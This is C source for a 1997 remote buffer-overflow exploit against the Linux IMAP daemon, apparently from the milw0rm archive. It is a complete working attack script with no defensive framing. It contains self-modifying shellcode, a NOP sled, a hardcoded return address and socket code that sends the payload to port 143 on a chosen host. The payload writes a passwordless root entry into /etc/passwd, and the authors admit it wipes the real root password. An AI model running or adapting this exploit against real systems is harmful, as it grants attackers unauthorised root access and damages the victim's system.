/* This is the remote exploit of the hole in the imap daemon, for Linux. The instruction code is doing open(), write(), and close() system calls, and it adds a line root::0:0.. at the beggining of /etc/passwd (change to /etc/shadow if needed). The code needs to be self modifying since imapd turns everything to lowercase before it pushes it on the stack. The problem is that it rewrites the first line of passwd/shadow, therefore loosing the root password. I'm sorry, but I don't have time to add in the seek syscall. - Akylonius ([email protected]) [1997] Modifications made on 5.1.97 to accept command line hostname, with 'h_to_ip' function that resolves it to an ip. - p1 ([email protected]) */ #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <arpa/inet.h> #include <netdb.h> char *h_to_ip(char *hostname); char *h_to_ip(char *hostname) { struct hostent *h; struct sockaddr_in tmp; struct in_addr in; h = gethostbyname(hostname); if (h==NULL) { perror("Resolving the host. \n"); exit(-1); } memcpy((caddr_t)&tmp.sin_addr.s_addr, h->h_addr, h->h_length); memcpy(&in,&tmp.sin_addr.s_addr,4); return(inet_ntoa(in)); } void banner(void) { system("clear"); printf("\nIMAP Exploit for Linux.\n"); printf("\n\tAuthor: Akylonius ([email protected])\n"); printf(" Modifications: p1 ([email protected])\n"); } main(int argc, char **argv) { int fd; struct sockaddr_in sckdaddr; char *hostname; char buf[4092]; int i=8; char realegg[] = "\xeb\x58\x5e" "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26" "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8" "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2" "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31" "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31" "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1" "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83" "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80" "iamaselfmodifyingmonsteryeahiam\xe8\x83\xff\xff\xff" "/etc/passwdxroot::0:0:r00t:/:/bin/bashx"; char *point = realegg; buf[0]='*'; buf[1]=' '; buf[2]='l'; buf[3]='o'; buf[4]='g'; buf[5]='i'; buf[6]='n'; buf[7]=' '; banner(); if (argc<2) { printf("\nUsage: %s <hostname>\n\n", argv[0]); exit(-1); } hostname=argv[1]; while(i<1034-sizeof(realegg) -1) /* -sizeof(realegg)+1) */ buf[i++]=0x90; while(*point) buf[i++]=*(point++); buf[i++]=0x83; /* ebp */ buf[i++]=0xf3; buf[i++]=0xff; buf[i++]=0xbf; buf[i++]=0x88; /* ret adr */ buf[i++]=0xf8; buf[i++]=0xff; buf[i++]=0xbf; buf[i++]=' '; buf[i++]='b'; buf[i++]='a'; buf[i++]='h'; buf[i++]='\n'; buf[i++]=0x0; if ((fd=socket(AF_INET,SOCK_STREAM,0))<0) perror("Error opening the socket. \n"); sckdaddr.sin_port=htons(143); sckdaddr.sin_family=AF_INET; sckdaddr.sin_addr.s_addr=inet_addr(h_to_ip(hostname)); if (connect(fd,(struct sockaddr *) &sckdaddr, sizeof(sckdaddr)) < 0) perror("Error with connecting. \n"); printf("hmm: \n"); getchar(); write(fd,buf,strlen(buf)+1); printf("hmm: \n"); close(fd); } // milw0rm.com [1997-06-24]